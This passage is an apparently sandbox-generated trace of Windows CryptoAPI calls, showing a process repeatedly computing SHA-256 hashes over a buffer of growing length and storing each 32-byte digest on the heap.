	[0239.684] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.685] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.685] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0239.685] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.685] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1200
	[0239.685] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1200, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1200, pdwDataLen=0x128ba4) returned 1
	[0239.685] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.685] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.685] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.685] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.685] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0239.685] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.685] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1228
	[0239.685] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1228, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1228, pdwDataLen=0x128ba4) returned 1
	[0239.685] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.685] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.685] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.686] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.686] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0239.686] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.686] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1250
	[0239.686] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1250, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1250, pdwDataLen=0x128ba4) returned 1
	[0239.686] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.686] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.686] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.686] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.686] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0239.686] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.687] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1278
	[0239.687] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1278, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1278, pdwDataLen=0x128ba4) returned 1
	[0239.687] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.687] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.687] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.687] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.687] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0239.687] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.687] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c12a0
	[0239.687] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c12a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c12a0, pdwDataLen=0x128ba4) returned 1
	[0239.687] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.687] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.687] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.688] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.688] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0239.688] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.688] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c12c8
	[0239.688] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c12c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c12c8, pdwDataLen=0x128ba4) returned 1
	[0239.688] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.688] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.688] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.688] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.688] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0239.688] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.688] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c12f0
	[0239.688] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c12f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c12f0, pdwDataLen=0x128ba4) returned 1
	[0239.688] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.688] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.688] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.689] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.689] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0239.689] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.689] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1318
	[0239.689] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1318, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1318, pdwDataLen=0x128ba4) returned 1
	[0239.689] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.689] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.689] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.689] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.689] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0239.689] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.689] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1340
	[0239.689] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1340, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1340, pdwDataLen=0x128ba4) returned 1
	[0239.689] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.689] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.689] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.690] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.690] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0239.690] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.690] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1368
	[0239.690] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1368, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1368, pdwDataLen=0x128ba4) returned 1
	[0239.690] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.690] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.690] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.690] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.690] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0239.690] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.690] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1390
	[0239.691] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1390, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1390, pdwDataLen=0x128ba4) returned 1
	[0239.691] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.691] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.691] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.691] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.691] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0239.691] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.691] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c13b8
	[0239.691] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c13b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c13b8, pdwDataLen=0x128ba4) returned 1
	[0239.691] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.691] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.691] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.692] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.692] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0239.692] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.692] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c13e0
	[0239.692] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c13e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c13e0, pdwDataLen=0x128ba4) returned 1
	[0239.692] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.692] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.692] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.692] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.692] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0239.692] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.692] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1408
	[0239.692] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1408, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1408, pdwDataLen=0x128ba4) returned 1
	[0239.692] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.692] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.692] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.693] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.693] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0239.693] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.693] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1430
	[0239.693] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1430, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1430, pdwDataLen=0x128ba4) returned 1
	[0239.693] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.693] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.693] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.694] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.694] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0239.694] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.694] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1458
	[0239.694] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1458, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1458, pdwDataLen=0x128ba4) returned 1
	[0239.694] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.694] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.694] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.695] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.695] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0239.695] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.695] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1480
	[0239.695] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1480, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1480, pdwDataLen=0x128ba4) returned 1
	[0239.695] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.695] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.695] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.696] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.696] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0239.696] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.696] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c14a8
	[0239.696] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c14a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c14a8, pdwDataLen=0x128ba4) returned 1
	[0239.696] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.696] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.696] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.696] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.696] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0239.696] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.696] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c14d0
	[0239.696] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c14d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c14d0, pdwDataLen=0x128ba4) returned 1
	[0239.696] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.696] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.696] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2892008) returned 1
	[0239.697] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2892008
	[0239.697] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.697] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.697] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0239.697] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.697] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c14f8
	[0239.697] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c14f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c14f8, pdwDataLen=0x128ba4) returned 1
	[0239.697] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.697] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.697] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.697] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.697] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0239.698] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.698] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1520
	[0239.698] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1520, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1520, pdwDataLen=0x128ba4) returned 1
	[0239.698] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.698] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.698] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.698] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.698] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0239.698] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.698] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1548
	[0239.698] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1548, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1548, pdwDataLen=0x128ba4) returned 1
	[0239.698] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.698] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.698] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.699] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.699] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0239.699] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.699] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1570
	[0239.699] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1570, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1570, pdwDataLen=0x128ba4) returned 1
	[0239.699] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.699] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.699] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.699] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.699] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0239.699] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.699] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1598
	[0239.699] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1598, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1598, pdwDataLen=0x128ba4) returned 1
	[0239.699] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.699] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.699] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.700] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.700] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0239.700] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.700] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c15c0
	[0239.700] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c15c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c15c0, pdwDataLen=0x128ba4) returned 1
	[0239.700] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.700] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
